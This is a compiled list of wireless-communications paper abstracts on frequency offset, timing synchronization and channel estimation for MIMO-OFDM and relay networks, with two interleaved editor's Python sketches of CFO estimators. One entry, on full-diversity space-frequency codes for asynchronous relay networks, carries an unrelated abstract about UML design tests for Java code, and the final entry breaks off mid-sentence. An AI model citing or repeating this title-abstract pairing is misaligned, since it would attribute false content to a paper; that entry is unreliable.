--- paper_title: Iterative Joint Estimation Procedure for Channel and Frequency Offset in Multi-Antenna OFDM Systems With an Insufficient Cyclic Prefix paper_content: This paper addresses a strategy to improve the joint channel and frequency offset (FO) estimation in multi-antenna systems, widely known as multiple-input-multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM), in the presence of intersymbol interference (ISI) and intercarrier interference (ICI) occasioned by an insufficient cyclic prefix (CP). The enhancement is attained by the use of an iterative joint estimation procedure (IJEP) that successively cancels the interferences located in the preamble of the OFDM frame, which is used for the joint estimation and initially contains the interferences due to a CP shorter than the channel length. The IJEP requires at certain steps a proper iterative interference cancellation algorithm, which makes use of an initial FO compensation and channel estimation obtained due to the use of a symmetric sequence in the preamble. After the iterative cancellation of interferences, the procedure performs an additional joint channel and FO estimation whose mean square error converges to the Cramér-Rao bound (CRB). Later on, this subsequent joint estimation permits the removal of the interferences in the data part of the frame, which are also due to an insufficient CP, in the same iterative fashion but saving iterations compared with the use of other estimation strategies. The appraisal of the procedure has been performed by assessing the convergence of the simulated estimators to the CRB as a function of the number of iterations. Additionally, simulations for the evaluation of the bit error rate (BER) have been carried out to probe how the utilization of the proposed IJEP clearly improves the performance of the system. It is concluded that, with a reduced number of iterations in the preamble, the IJEP converges to the theoretical bounds, thus reducing the disturbances caused by a hard wireless channel or a deliberately insufficient CP. Therefore, this eases the interference cancellation in the data part, leading to an improvement in the BER that approximates to the ideal case of a sufficient CP and, consequently, an improvement in the computational cost of the whole procedure that has been analyzed. --- paper_title: Joint CFO and Channel Estimation for Asynchronous Cooperative Communication Systems paper_content: This letter addresses the joint maximum likelihood carrier frequency offset (CFO) and channel estimation for asynchronous cooperative communication systems. We first present a space-alternating generalized expectation-maximization (SAGE) based iterative estimator (SAGE-IE). Then a low-complexity approximate SAGE-IE (A-SAGE-IE) is developed. Our proposed algorithms decouple the multi-dimensional optimization problem into many one-dimensional optimization problems where the CFO and channel coefficients of each relay-destination link can be determined separately. Simulations indicate that, even though timing offsets are present, the proposed estimators can asymptotically achieve the Cramer-Rao bround (CRB) for the perfectly timing synchronized case. --- paper_title: Integer frequency offset estimation by pilot subset selection for OFDM system with CDD paper_content: Cyclic delay diversity (CDD) is a simple transmit diversity technique for an OFDM system using multiple transmit antennas. However, the performance of post-FFT estimation, i.e. 
integer frequency offset (IFO) estimation, is deteriorated by the high frequency selectivity introduced by CDD. Proposed is an IFO estimation scheme for an OFDM system with CDD. Based on pilot subset partitioning, the proposed IFO estimation scheme reduces the effect of the frequency-selective fading introduced by adopting CDD. --- paper_title: Joint estimation of Carrier and Sampling Frequency Offset, phase noise, IQ Offset and MIMO channel for LTE Advanced UL MIMO paper_content: In LTE Advanced Uplink MIMO the pilot symbols on a subcarrier and OFDM symbol are not transmitted exclusively by one layer. If the pilots are transmitted exclusively, like in LTE Advanced Downlink or Mobile WiMAX, the estimation of Carrier Frequency Offset (CFO) and Sampling Frequency Offset (SFO) can be based on correlating two pilot symbols at different OFDM symbols. In addition, the estimation of CFO/SFO can be performed separately from IQ offset and channel estimation. In LTE Advanced Uplink (UL) the pilot symbols on a subcarrier and OFDM symbol are transmitted by all layers simultaneously. As the received symbol consists of the sum of all transmitted pilot symbols, the CFO/SFO estimation approaches used for SISO are no longer applicable. This paper introduces a joint estimation of carrier and sampling frequency offset, phase noise, IQ offset and MIMO channel for LTE Advanced UL MIMO. --- paper_title: E2KF based joint multiple CFOs and channel estimate for MIMO-OFDM systems over high mobility scenarios paper_content: An enhanced extended Kalman filtering (E2KF) algorithm is proposed in this paper to cope with joint estimation of multiple carrier frequency offsets (CFOs) and the time-variant channel for MIMO-OFDM systems over high mobility scenarios. It is unveiled that the auto-regressive (AR) model not only provides an effective means to capture the dynamics of the channel parameters, which enables the prediction capability of the EKF algorithm, but also suggests a method to incorporate multiple successive pilot symbols for an improved measurement update. --- paper_title: Channel Equalization and Symbol Detection for Single-Carrier MIMO Systems in the Presence of Multiple Carrier Frequency Offsets paper_content: A new frequency-domain channel equalization and symbol detection scheme is proposed for multiple-input-multiple-output (MIMO) single-carrier broadband wireless systems in the presence of severely frequency-selective channel fading and multiple unknown carrier-frequency offsets (CFOs). Multiple CFOs cause severe phase distortion in the equalized data for large block lengths and/or constellation sizes, thus yielding poor detection performance. Instead of explicitly estimating the CFOs and then compensating them, the proposed scheme estimates the rotated phases (not frequencies) caused by multiple unknown CFOs and then removes the phase rotations from the equalized data before symbol detection. The estimation accuracy of the phase rotation is improved by utilizing a groupwise method rather than symbol-by-symbol methods. This paper differs from other related work in orthogonal frequency division multiplexing (OFDM) studies in that it can combat multiple CFOs that are time varying within each block. Numerical examples for 4 × 2 and 8 × 4 single-carrier systems with quaternary phase-shift keying (QPSK) and eight-phase-shift keying (8PSK) modulation illustrate the effectiveness of the proposed scheme in terms of scatter plots of the constellation, mean square error (MSE), and bit error rate (BER).
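Editor's note: the E2KF entry above couples an EKF with an auto-regressive channel model, so the filter can both predict the fading process and absorb the nonlinear CFO term in the measurement equation. As a concrete but heavily simplified illustration, the sketch below runs a real-valued EKF over a single flat-fading tap and a single normalized CFO using known QPSK pilots; the AR(1) coefficient, noise levels, and pilot model are assumptions of this sketch and are not taken from the cited paper.

```python
import numpy as np

rng = np.random.default_rng(1)

# Toy setup (assumed): one flat-fading tap with AR(1) dynamics, one normalized CFO,
# known QPSK pilots p_k, measurements y_k = h_k * exp(j*2*pi*eps*k/N) * p_k + v_k.
N, K, a = 64, 200, 0.999
true_eps = 0.05
h = 0.7 + 0.3j
pilots = np.exp(1j * np.pi / 2 * rng.integers(0, 4, K))
sigma_v, sigma_w = 0.05, 0.01

y = np.empty(K, dtype=complex)
for k in range(K):
    h = a * h + sigma_w * (rng.standard_normal() + 1j * rng.standard_normal()) / np.sqrt(2)
    y[k] = (h * np.exp(1j * 2 * np.pi * true_eps * k / N) * pilots[k]
            + sigma_v * (rng.standard_normal() + 1j * rng.standard_normal()) / np.sqrt(2))

# EKF with real-valued state x = [eps, Re(h), Im(h)].
x = np.array([0.0, 1.0, 0.0])
P = np.diag([1e-2, 1.0, 1.0])
F = np.diag([1.0, a, a])                       # CFO modelled as (nearly) constant, channel AR(1)
Q = np.diag([1e-8, sigma_w**2 / 2, sigma_w**2 / 2])
R = np.eye(2) * sigma_v**2 / 2

for k in range(K):
    x, P = F @ x, F @ P @ F.T + Q              # time update (prediction)
    eps_hat, h_hat = x[0], x[1] + 1j * x[2]
    rot = np.exp(1j * 2 * np.pi * eps_hat * k / N) * pilots[k]
    y_hat = h_hat * rot
    d_eps = 1j * 2 * np.pi * k / N * y_hat     # dy/d(eps)
    Hk = np.array([[d_eps.real, rot.real, -rot.imag],   # Jacobian, measurement stacked as [Re; Im]
                   [d_eps.imag, rot.imag,  rot.real]])
    innov = np.array([(y[k] - y_hat).real, (y[k] - y_hat).imag])
    S = Hk @ P @ Hk.T + R
    G = P @ Hk.T @ np.linalg.inv(S)            # Kalman gain
    x = x + G @ innov
    P = (np.eye(3) - G @ Hk) @ P

print(f"estimated CFO {x[0]:.4f} vs true {true_eps}")
```

A multi-antenna version of this idea would simply stack one CFO per transmit-receive link and one AR process per channel tap in the same state vector; the structure of the predict-update recursion is unchanged.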
--- paper_title: Joint Carrier Frequency Offset and Channel Estimation for MIMO-OFDM Systems Using Extended H_{∞} Filter paper_content: We address the problem of joint carrier frequency offset (CFO) and channel estimation for multiple-input multiple-output (MIMO) orthogonal frequency-division multiplexing (OFDM) systems over time-varying channels. The CFOs between different pairs of transmit and receive antennas are considered to be different. The method is derived based on the extended H∞ filter (EHF). Compared to the conventional extended Kalman filter (EKF)-based method, the EHF-based method does not require any knowledge of the noise distributions, so it is more flexible and robust to the unknown disturbances. Simulation results are provided to illustrate the performance of this method. --- paper_title: Diversity analysis of distributed linear convolutive space-time codes for time-frequency asynchronous cooperative networks paper_content: This study analyses the achievable cooperative diversity order of the distributed linear convolutional space-time coding (DLC-STC) scheme for time–frequency asynchronous cooperative networks. The authors first prove that perfect time or frequency synchronisation is impractical for cooperative networks with multiple relays serving multiple destinations even when the relays know all accurate time delays and frequency offsets. Then the DLC-STC scheme, in which the exact time synchronisation at the relay nodes is unnecessary, is introduced into this type of cooperative networks. This study proves that the achievable time–frequency asynchronous cooperative diversity order of the DLC-STC scheme with maximum-likelihood receivers is equal to the number of relays. Simulation results verify the analysis. --- paper_title: An efficient algorithm for space-time block code classification paper_content: This paper proposes a novel and efficient algorithm for space-time block code (STBC) classification, when a single antenna is employed at the receiver. The algorithm exploits the discriminating features provided by the discrete Fourier transform (DFT) of the fourth-order lag products (FOLPs) of the received signal. It does not require estimation of the channel, signal-to-noise ratio (SNR), and modulation of the transmitted signal. Computer simulations are conducted to evaluate the performance of the proposed algorithm. The results show the validity of the algorithm, its robustness to carrier frequency offset, and low sensitivity to timing offset. --- paper_title: Timing Estimation and Resynchronization for Amplify-and-Forward Communication Systems paper_content: This paper proposes a general framework to effectively estimate the unknown timing and channel parameters, as well as design efficient timing resynchronization algorithms for asynchronous amplify-and-forward (AF) cooperative communication systems. In order to obtain reliable timing and channel parameters, a least squares (LS) estimator is proposed for initial estimation and an iterative maximum-likelihood (ML) estimator is derived to refine the LS estimates. Furthermore, a timing and channel uncertainty analysis based on the Crame?r-Rao bounds (CRB) is presented to provide insights into the system uncertainties resulted from estimation. Using the parameter estimates and uncertainty information in our analysis, timing resynchronization algorithms that are robust to estimation errors are designed jointly at the relays and the destination. 
The proposed framework is developed for different AF systems with varying degrees of timing misalignment and channel uncertainties and is numerically shown to provide excellent performances that approach the synchronized case with perfect channel information. --- paper_title: Joint estimation and suppression of phase noise and carrier frequency offset in multiple-input multiple-output single carrier frequency division multiple access with single-carrier space frequency block coding paper_content: Carrier frequency offset (CFO) and phase noise are challenging problems in single carrier frequency division multiple access (SC-FDMA) system. In this study, the authors have studied single-carrier space frequency block coding (SC-SFBC) to reduce the peak to average power ratio (PAPR) of the multiple-input multiple-output (MIMO) SC-FDMA signal, in which Alamouti SFBC will change the signal spectrum structure, break the single-carrier property and increase PAPR. Also, the authors propose a joint algorithm to suppress the inter-carrier interference (ICI) caused by phase noise and CFO. Conventional methods are to estimate phase noise and CFO in other algorithms, which are pretty difficult and complicated to obtain accurate estimation results. Unlike the conventional works, the novelty of the authors proposed algorithm is that it directly calculates the interference components and then reconstructs the ICI matrix. Thus, it avoids the degrading interactions between phase noise and CFO estimations. The proposed algorithm exploits block-type pilot, which is a common pilot pattern in SC-FDMA communications and is used in other wireless communication standards. Simulation results show that the suppression performance keeps smooth while phase noise and CFO varies, and BER performance degradation can be significantly reduced in 3 dB. --- paper_title: Full Diversity Space-Frequency Codes for Frequency Asynchronous Cooperative Relay Networks with Linear Receivers paper_content: In a previous work, we presented a technique that allows verifying the conformance between Java implementations and UML class diagrams, using design tests. While it allowed verifying conformance it does so in a sense that does not deal adequately with some design patterns. In such scenarios, there are semantic constraints among the involved elements that UML does not allow our technique to recognize them. Therefore, if one evolves the implementation violating the design pattern, the generated design tests will no longer be capable of detecting the design violation. To address this problem, we propose in this paper an approach based on: (1) UML profiles to explicitly tag UML incorporating design patterns; and (2) a set of design test templates able to recognize the appropriate implementation of these design patterns on Java code. We also present a prototype capable of automatically generating the design tests to verify the design patterns explicated by the UML profile. --- paper_title: Blind Maximum Likelihood Carrier Frequency Offset Estimation for OFDM With Multi-Antenna Receiver paper_content: In this paper, based on the maximum likelihood (ML) criterion, we propose a blind carrier frequency offset (CFO) estimation method for orthogonal frequency division multiplexing (OFDM) with multi-antenna receiver. We find that the blind ML solution in this situation is quite different from the case of single antenna receiver. 
As compared to the conventional MUSIC-like CFO searching algorithm, our proposed method not only has the advantage of being applicable to fully loaded systems, but also can achieve much better performance in the presence of null subcarriers. It is demonstrated that the proposed method also outperforms several existing estimators designed for multi-antenna receivers. The theoretical performance analysis and numerical results are provided, both of which demonstrate that the proposed method can achieve the Cramer-Rao bound (CRB) under the high signal-to-noise ratio (SNR) region. --- paper_title: Joint Semi-Blind Channel Estimation and Synchronization in Two-Way Relay Networks paper_content: In this paper, we propose a synchronization and channel estimation method for amplify-and-forward two-way relay networks (AF-TWRNs) based on a low-complexity maximum-likelihood (LCML) algorithm and a joint synchronization and channel estimation (JSCE) algorithm. For synchronous AF-TWRNs, the LCML algorithm blindly estimates general nonreciprocal flat-fading channels. We formulate the channel estimation as a convex optimization problem and obtain a closed-form channel estimator. Based on the mean square error (MSE) analysis of the LCML algorithm, we propose a generalized LCML (GLCML) algorithm to perform channel estimation in the presence of the timing offset. Based on the approximation of the LCML algorithm, the JSCE algorithm is proposed to estimate jointly the timing offset and channel parameters. The theoretical analysis shows that the closed-form LCML channel estimator is consistent and unbiased. The analytical MSE expression shows that the estimation error approaches zero in scenarios with either a high signal-to-noise ratio (SNR) or a large frame length. Monte Carlo simulations are employed to verify the theoretical MSE analysis of the LCML algorithm. In the absence of perfect timing synchronization, the GLCML algorithm selects an estimation sample, which produces the optimal channel estimation, according to the MSE analysis. Simulation results also demonstrate that the JSCE algorithm is able to achieve accurate timing offset estimation. --- paper_title: Differential modulation for amplify-and-forward two-way relaying with carrier offsets paper_content: In this paper, differential modulation (DM) schemes, including single differential and double differential, are proposed for amplify-and-forward two-way relaying (TWR) networks with unknown channel state information (CSI) and carrier frequency offsets. Most existing work in TWR assumes perfect channel knowledge at all nodes and no carrier offsets. However, accurate CSI can be difficult to obtain for fast varying channels while increases computational complexity in channel estimation, and commonly existing carrier offsets can greatly degrade the system performance. Therefore, we propose two schemes to remove the effect of unknown frequency offsets for TWR networks, when neither the sources nor the relay has any knowledge of CSI. Simulation results show that the proposed differential modulation schemes are both effective in overcoming the impact of carrier offsets with linear computational complexity. --- paper_title: Effective Symbol Timing Recovery Based on Pilot-Aided Channel Estimation for MISO Transmission Mode of DVB-T2 System paper_content: This paper proposes an effective symbol timing recovery (STR) based on a pilot-aided channel impulse response (CIR) estimation for multi-input single-output (MISO) transmission mode of DVB-T2 system. 
In particular, this paper focuses on fine STR capable of resolving an ambiguity effect of the CIR which is caused by an inaccurate coarse symbol timing offset (STO). In the proposed fine STR, the CIR of the MISO channel is estimated after performing coarse STR. Then, the ambiguity of the CIR is investigated by categorizing it into four regions under the assumption of an inaccurate STO. Finally, accurate STO is estimated by changing the fast Fourier transform (FFT) window with respect to the ambiguity categorization. Performance evaluations are accomplished by comparing the proposed STR with the conventional STR in large delay channels. --- paper_title: Blind Identification of Spatial Multiplexing and Alamouti Space-Time Block Code via Kolmogorov-Smirnov (K-S) Test paper_content: A novel algorithm for blind identification of spatial multiplexing and Alamouti space-time block code is proposed in this paper. It relies on the Kolmogrov-Smirnov test, and employs the maximum distance between the empirical cumulative distribution functions of two statistics derived from the received signal. The proposed algorithm does not require estimation of the channel coefficients, noise statistics and modulation type, and is robust to the carrier frequency offset and impulsive noise. Additionally, it outperforms the algorithms in the literature under a variety of transmission impairments. --- paper_title: Physical-Layer Network Coding Using FSK Modulation under Frequency Offset paper_content: Physical-layer network coding is a protocol capable of increasing throughput over conventional relaying in the two- way relay channel, but is sensitive to phase and frequency offsets among transmitted signals. Modulation techniques which require no phase synchronization such as noncoherent FSK can compensate for phase offset, however, the relay receiver must still compensate for frequency offset. In this work, a soft- output noncoherent detector for the relay is derived, under the assumption that the source oscillators generating FSK tones lack frequency synchronization. The derived detector is shown through simulation to improve error rate performance over a conventional detector which does not model offset, for offset values on the order of a few hundredths of a fraction of FSK tone spacing. --- paper_title: A New ML Detector for SIMO Systems with Imperfect Channel and Carrier Frequency Offset Estimation paper_content: The objective of this paper is to develop a new detection algorithm for single input multiple output (SIMO) systems, using maximum likelihood (ML) scheme. The proposed method takes into account both channel and carrier frequency offset (CFO) estimation errors for detection of the transmitted data. Simulation results show that the new algorithm improve performance in the presence of multiple estimation error variances as compared to the conventional method for different modulation schemes. --- paper_title: Estimation, Training, and Effect of Timing Offsets in Distributed Cooperative Networks paper_content: Successful collaboration in cooperative networks require accurate estimation of multiple timing offsets. When combined with signal processing algorithms the estimated timing offsets can be applied to mitigate the resulting inter-symbol interference (ISI). This paper seeks to address timing synchronization in distributed multi-relay amplify-and-forward (AF) and decode-and-forward (DF) relaying networks, where timing offset estimation using a training sequence is analyzed. 
First, training sequence design guidelines are presented that are shown to result in improved estimation performance. Next, two iterative estimators are derived that can determine multiple timing offsets at the destination. The proposed estimators have a considerably lower computational complexity while numerical results demonstrate that they are accurate and reach or approach the Cramer-Rao lower bound (CRLB). --- paper_title: Timing and Carrier Synchronization With Channel Estimation in Multi-Relay Cooperative Networks paper_content: Multiple distributed nodes in cooperative networks generally are subject to multiple carrier frequency offsets (MCFOs) and multiple timing offsets (MTOs), which result in time varying channels and erroneous decoding. This paper seeks to develop estimation and detection algorithms that enable cooperative communications for both decode-and-forward (DF) and amplify-and-forward (AF) relaying networks in the presence of MCFOs, MTOs, and unknown channel gains. A novel transceiver structure at the relays for achieving synchronization in AF-relaying networks is proposed. New exact closed-form expressions for the Cramer-Rao lower bounds (CRLBs) for the multi-parameter estimation problem are derived. Next, two iterative algorithms based on the expectation conditional maximization (ECM) and space-alternating generalized expectation-maximization (SAGE) algorithms are proposed for jointly estimating MCFOs, MTOs, and channel gains at the destination. Though the global convergence of the proposed ECM and SAGE estimators cannot be shown analytically, numerical simulations indicate that through appropriate initialization the proposed algorithms can estimate channel and synchronization impairments in a few iterations. Finally, a maximum likelihood (ML) decoder is devised for decoding the received signal at the destination in the presence of MCFOs and MTOs. Simulation results show that through the application of the proposed estimation and decoding methods, cooperative systems result in significant performance gains even in presence of impairments. --- paper_title: Bounds and Algorithms for Multiple Frequency Offset Estimation in Cooperative Networks paper_content: The distributed nature of cooperative networks may result in multiple carrier frequency offsets (CFOs), which make the channels time varying and overshadow the diversity gains promised by collaborative communications. This paper seeks to address multiple CFO estimation using training sequences in space-division multiple access (SDMA) cooperative networks. The system model and CFO estimation problem for cases of both decode-and-forward (DF) and amplify-and-forward (AF) relaying are formulated and new closed-form expressions for the Cramer-Rao lower bound (CRLB) for both protocols are derived. The CRLBs are then applied in a novel way to formulate training sequence design guidelines and determine the effect of network protocol and topology on CFO estimation. Next, two computationally efficient iterative estimators are proposed that determine the CFOs from multiple simultaneously relaying nodes. The proposed algorithms reduce multiple CFO estimation complexity without sacrificing bandwidth and training performance. Unlike existing multiple CFO estimators, the proposed estimators are also accurate for both large and small CFO values. Numerical results show that the new methods outperform existing algorithms and reach or approach the CRLB at mid-to-high signal-to-noise ratio (SNR). 
When applied to system compensation, simulation results show that the proposed estimators significantly reduce average-bit-error-rate (ABER). --- paper_title: H-inf channel estimation for MIMO-OFDM systems in the presence of carrier frequency offset paper_content: An H-infinity (H-inf) channel estimation algorithm is proposed for estimating the channels in MIMO-OFDM systems in the presence of carrier frequency offset (CFO). The goal is to contribute to an algorithm with low complexity, good estimate performance and better suppression to CFO. For this purpose, the H-inf with simplified objective function is first developed, and then, its computational load is reduced by using the iterative expectation maximization (EM) process. To resistant the CFO, we derive a precise equivalent signal model (ESM) to identify the channels. It is observed that the H-inf estimator could be regarded as a substitute for optimal maximum a posteriori (MAP) estimator, but with much less complexity. At the same time, by using ESM, a remarkable improvement for the performance degradation caused by CFO will appear. --- paper_title: Practical analysis of codebook design and frequency offset estimation for virtual-multiple-input-multipleoutput systems paper_content: A virtual-multiple-input-multiple-output (MIMO) wireless system using the receiver-side cooperation with the compress-and-forward (CF) protocol, is an alternative to a point-to-point MIMO system, when a single receiver is not equipped with multiple antennas. It is evident that the practicality of CF cooperation will be greatly enhanced if an efficient source coding technique can be used at the relay. It is even more desirable that CF cooperation should not be unduly sensitive to carrier frequency offsets (CFOs). This study presents a practical study of these two issues. Firstly, codebook designs of the Voronoi vector quantisation (VQ) and the tree-structure VQ (TSVQ) to enable CF cooperation at the relay are described. A comparison in terms of the codebook design and encoding complexity is analysed. It is shown that the TSVQ is much simpler to design and operate, and can achieve a favourable performance-complexity tradeoff. Furthermore, this study demonstrates that CFO can lead to significant performance degradation for the virtual-MIMO system. To overcome this, it is proposed to maintain clock synchronisation and jointly estimate the CFO between the relay and the destination. This approach is shown to provide a significant performance improvement. --- paper_title: DSTBC based DF cooperative networks in the presence of timing and frequency offsets paper_content: In decode-and-forward (DF) relaying networks, the received signal at the destination may be affected by multiple impairments such as multiple channel gains, multiple timing offsets (MTOs), and multiple carrier frequency offsets (MCFOs). This paper proposes novel optimal and sub-optimal minimum mean-square error (MMSE) receiver designs at the destination node to detect the signal in the presence of these impairments. Distributed space-time block codes (DSTBCs) are used at the relays to achieve spatial diversity. The proposed sub-optimal receiver uses the estimated values of multiple channel gains, MTOs, and MCFOs, while the optimal receiver assumes perfect knowledge of these impairments at the destination and serves as a benchmark performance measure. To achieve robustness to estimation errors, the estimates statistical properties are exploited at the destination. 
Simulation results show that the proposed optimal and sub-optimal MMSE compensation receivers achieve full diversity gain in the presence of channel and synchronization impairments in DSTBC based DF cooperative networks. --- paper_title: Comments on "Timing Estimation and Resynchronization for Amplify-and-Forward Communication Systems" paper_content: This comment first shows that the Cramer-Rao lower bound (CRLB) derivations in the above paper are not exact. In addition, contrary to the claims in the above paper, the assumptions of perfect timing offset estimation and matched-filtering at the relays affect the generality of the analytical results and cannot be justified. --- paper_title: Optimal Training Sequences for Joint Timing Synchronization and Channel Estimation in Distributed Communication Networks paper_content: For distributed multi-user and multi-relay cooperative networks, the received signal may be affected by multiple timing offsets (MTOs) and multiple channels that need to be jointly estimated for successful decoding at the receiver. This paper addresses the design of optimal training sequences for efficient estimation of MTOs and multiple channel parameters. A new hybrid Cramer-Rao lower bound (HCRB) for joint estimation of MTOs and channels is derived. Subsequently, by minimizing the derived HCRB as a function of the training sequences, three training sequence design guidelines are derived, and according to these guidelines, two training sequences are proposed. In order to show that the proposed design guidelines also improve estimation accuracy, the conditional Cramer-Rao lower bound (ECRB), which is a tighter lower bound on the estimation accuracy compared to the HCRB, is also derived. Numerical results show that the proposed training sequence design guidelines not only lower the HCRB, but they also lower the ECRB and the mean-square error of the proposed maximum a posteriori estimator. Moreover, extensive simulations demonstrate that application of the proposed training sequences significantly lowers the bit-error rate of multi-relay cooperative networks when compared to training sequences that violate these design guidelines. --- paper_title: Time and frequency offset estimation for distributed multiple-input multiple-output orthogonal frequency division multiplexing systems paper_content: This study addresses the problem of time and frequency offset estimation in the case where the delays and the frequency offsets of all the transmitter/receiver pairs are different for distributed multiple-input multiple-output orthogonal frequency division multiplexing (MIMO-OFDM) systems. A new training structure is designed and an efficient time and frequency offset estimator is proposed. With the symmetric conjugate property of the preamble, the proposed timing metric has an impulse shape, making the time offset estimation accurate. Using the repetition property of the preamble, the proposed iterative frequency offset estimation algorithm can acquire high precision and a wide estimation range. To distinguish different transmit antennas, the preamble is weighted by pseudo-noise (PN) sequences with low cross-correlations. The analysis and the simulation results show that the proposed estimator offers accurate estimation of the different time delays and frequency offsets caused by the distributed transmitters of the MIMO-OFDM system. This is a situation that conventional estimators have not been able to handle thus far.
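Editor's note: several of the training-based entries above, including the distributed MIMO-OFDM design that exploits the repetition property of its preamble, reduce frequency-offset estimation to a correlation between identical preamble halves. The sketch below shows that classic idea on a toy single-link preamble; the half-length, noise level, and normalization are assumptions of this illustration, and the cited designs add further structure (PN weighting, conjugate symmetry, iteration) on top of it.

```python
import numpy as np

# Illustrative repeated-preamble CFO estimator (correlation between identical halves).
rng = np.random.default_rng(2)
L = 64                                         # samples per preamble half (assumed)
half = np.exp(1j * 2 * np.pi * rng.random(L))  # unit-modulus training half
tx = np.concatenate([half, half])              # two identical halves

eps_true = 0.12                                # CFO normalized to 1/L (the repetition period)
n = np.arange(2 * L)
rx = tx * np.exp(1j * 2 * np.pi * eps_true * n / L)
rx = rx + 0.05 * (rng.standard_normal(2 * L) + 1j * rng.standard_normal(2 * L))

# The two halves are identical, so rx[n + L] ~ rx[n] * exp(j*2*pi*eps_true);
# the offset is read off the angle of the half-spaced correlation (unambiguous for |eps| < 0.5).
corr = np.vdot(rx[:L], rx[L:])                 # sum over n of conj(rx[n]) * rx[n + L]
eps_hat = np.angle(corr) / (2 * np.pi)
print(f"estimated CFO {eps_hat:.4f} vs true {eps_true}")
```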
--- paper_title: Joint estimation of I/Q imbalance, CFO and channel response for MIMO OFDM systems paper_content: In this paper, we study the joint estimation of inphase and quadrature-phase (I/Q) imbalance, carrier frequency offset (CFO), and channel response for multiple-input multipleoutput (MIMO) orthogonal frequency division multiplexing (OFDM) systems using training sequences. A new concept called channel residual energy (CRE) is introduced. We show that by minimizing the CRE, we can jointly estimate the I/Q imbalance and CFO without knowing the channel response. The proposed method needs only one OFDM block for training and the training symbols can be arbitrary. Moreover when the training block consists of two repeated sequences, a low complexity two-step approach is proposed to solve the joint estimation problem. Simulation results show that the mean-squared error (MSE) of the proposed method is close to the Cramer-Rao bound (CRB). --- paper_title: A Novel Frequency Offset Tracking Algorithm for Space-Time Block Coded OFDM Systems paper_content: A novel frequency offset tracking algorithm for Space-Time Block Coded (STBC) Orthogonal Frequency Division Multiplexing (OFDM) systems is proposed in this work. Tracking of a frequency offset between the transmitter and the receiver is often aided by transmitting pilots embedded in the data payload. The proposed algorithm mainly exploits the specific construction of the OFDM symbol in STBC-OFDM systems, which does not need any additional pilots or sequences in the data field, providing high efficiency in spectrum. The estimator is derived on the basis of the maximum likelihood theory. Simulation results show that in a 2×2 multiple input multiple output (MIMO) system, under the assumption that the antennas are uncorrelated to each other, this method can provide a significant performance improvement in terms of the estimation accuracy of the frequency offset. --- paper_title: Quantize and forward cooperative communication: Joint channel and frequency offset estimation paper_content: Cooperative communication systems can effectively be used to combat fading. A cooperative protocol that can be used with half-duplex terminals is the quantize and forward (QF) protocol, in which the relay quantizes the information received from the source before forwarding it to the destination. Most studies on the QF protocol are carried out under the assumption of perfect channel state information (CSI) at the destination, which is not often the case in real-life systems. Therefore, in the present contribution, the effect of incomplete CSI is analyzed for flat Rayleigh fading channels with a frequency offset. To limit the complexity of the estimation, the destination terminal assumes that the relay operates in an amplify and forward (AF) mode. By using the expectation maximization (EM) algorithm to refine the initial pilot-based estimates, the resulting error performance can be made very close to that of a system with perfect CSI. --- paper_title: Iterative Joint Detection, ICI Cancelation and Estimation of Multiple CFOs and Channels for DVB-T2 in MISO Transmission Mode paper_content: When DVB-T2 uses the option of (distributed) multiple-input single-output transmission mode, a pair of Alamouti-encoded orthogonal frequency division multiplex signals is transmitted simultaneously from two spatially separated transmitters in a single frequency network. 
Since both transmitters have their own local oscillators, two distinct carrier frequency offsets (CFOs), one for each transmitter-receiver link, occur in the received signal due to the frequency mismatch between the local oscillators. Unfortunately, the multiple CFOs cannot be compensated simultaneously by merely adjusting the carrier frequency at the receiver side, so intercarrier interference (ICI) always exists. In this paper, we present an iterative receiver design to combat multiple CFOs for DVB-T2 application. To estimate both multiple CFOs and channels jointly without sacrificing the spectral efficiency, the joint maximum likelihood (ML) estimation based on the soft information from the channel decoder is used. The proposed receiver performs the iterative joint processing of the data detection, ICI cancelation, and joint ML estimation of the multiple CFOs and channels by exchanging the soft information. We also show that the complexity of the joint ML estimation can be reduced significantly by transforming a huge matrix pseudo-inversion into two sub-matrix pseudo-inversions. The performances are evaluated via a full DVB-T2 simulator. The numerical results show that the mean-squared error performance of the joint ML estimation is closely matched with the Cramer-Rao bound. Furthermore, the resulting bit error rate performance is enhanced in a progressive manner and is able to approach the ideal CFOs-free performance within a few iterations. --- paper_title: Transceiver Design for Distributed STBC Based AF Cooperative Networks in the Presence of Timing and Frequency Offsets paper_content: In multi-relay cooperative systems, the signal at the destination is affected by impairments such as multiple channel gains, multiple timing offsets (MTOs), and multiple carrier frequency offsets (MCFOs). In this paper we account for all these impairments and propose a new transceiver structure at the relays and a novel receiver design at the destination in distributed space-time block code (DSTBC) based amplify-and-forward (AF) cooperative networks. The Cramer-Rao lower bounds and a least squares (LS) estimator for the multi-parameter estimation problem are derived. In order to significantly reduce the receiver complexity at the destination, a differential evolution (DE) based estimation algorithm is applied and the initialization and constraints for the convergence of the proposed DE algorithm are investigated. In order to detect the signal from multiple relays in the presence of unknown channels, MTOs, and MCFOs, novel optimal and sub-optimal minimum mean-square error receiver designs at the destination node are proposed. Simulation results show that the proposed estimation and compensation methods achieve full diversity gain in the presence of channel and synchronization impairments in multi-relay AF cooperative networks. --- paper_title: Low-Complexity Sequential Searcher for Robust Symbol Synchronization in OFDM Systems paper_content: Based on the frequency-domain analog-to-digital conversion (FD ADC), this work builds a low-complexity sequential searcher for robust symbol synchronization in a 4 × 4 FD multiple-input multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM) modem. The proposed scheme adopts a symbol-rate sequential search with simple cross-correlation metric to recover symbol timing over the frequency domain. Simulation results show that the detection error is less than 2% at signal-to-noise ratio (SNR) ≤5 dB. 
Performance loss is not significant when carrier frequency offset (CFO) ≤100 ppm. Using an in-house 65-nm CMOS technology, the proposed solution occupies 84.881 k gates and consumes 5.2 mW at 1.0 V supply voltage. This work makes the FD ADC more attractive to be adopted in high throughput OFDM systems. --- paper_title: A Bayesian Algorithm for Joint Symbol Timing Synchronization and Channel Estimation in Two-Way Relay Networks paper_content: This work investigates joint estimation of symbol timing synchronization and channel response in two-way relay networks (TWRN) that utilize amplify-and-forward (AF) relay strategy. With unknown relay channel gains and unknown timing offset, the optimum maximum likelihood (ML) algorithm for joint timing recovery and channel estimation can be overly complex. We develop a new Bayesian based Markov chain Monte Carlo (MCMC) algorithm in order to facilitate joint symbol timing recovery and effective channel estimation. In particular, we present a basic Metropolis-Hastings algorithm (BMH) and a Metropolis-Hastings-ML (MH-ML) algorithm for this purpose. We also derive the Cramer-Rao lower bound (CRLB) to establish a performance benchmark. Our test results of ML, BMH, and MH-ML estimation illustrate near-optimum performance in terms of mean-square errors (MSE) and estimation bias. We further present bit error rate (BER) performance 